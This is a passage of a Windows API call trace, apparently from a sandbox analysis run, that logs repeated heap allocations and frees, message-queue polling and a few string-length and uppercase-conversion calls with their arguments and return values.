dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5d20 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb48 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcf8 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0081.789] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5eb0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbd8 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc80 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0430 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5d48 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02b0 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5ed8 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebad0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebae8 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5eb0 | out: hHeap=0x2af0000) returned 1 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbd8 | out: hHeap=0x2af0000) returned 1 [0081.789] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f28 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc98 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02f0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb00 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0360 [0081.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb60 [0081.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb60 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0081.790] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb90 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0360 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd40 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbd8 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc08 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebce0 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0610 [0081.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc08 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbd8 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebce0 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.791] lstrlenW (lpString="20") returned 2 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd88 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd40 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebba8 [0081.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbf0 [0081.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb90 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebbf0 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebba8 | out: hHeap=0x2af0000) returned 1 [0081.791] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.864] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd10 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0360 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebda0 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0690 | out: hHeap=0x2af0000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb60 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0690 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb78 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd88 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebda0 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.865] lstrlenW (lpString="31") returned 2 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb60 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0690 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb78 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd10 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.865] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.865] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb60 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0360 [0081.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd10 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb78 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb90 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0500 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebba8 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd10 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb78 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.866] lstrlenW (lpString="20") returned 2 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb90 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebba8 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb60 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebba8 [0081.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0350 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebba8 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.867] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0081.867] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0350 | out: hHeap=0x2af0000) returned 1 [0081.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcf8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb48 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5d20 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5fa0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb00 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc98 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02f0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5f28 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebae8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebad0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5ed8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02b0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5d48 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebdb8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39a8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc68 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f38e8 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03c0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3930 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03f0 | out: hHeap=0x2af0000) returned 1 [0081.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3990 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f3930 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebda0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb48 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02b0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5ff0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02f0 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5eb0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb78 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb60 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebda0 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f28 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.868] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5f28 | out: hHeap=0x2af0000) returned 1 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb90 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x29e0360 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbf0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd40 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0370 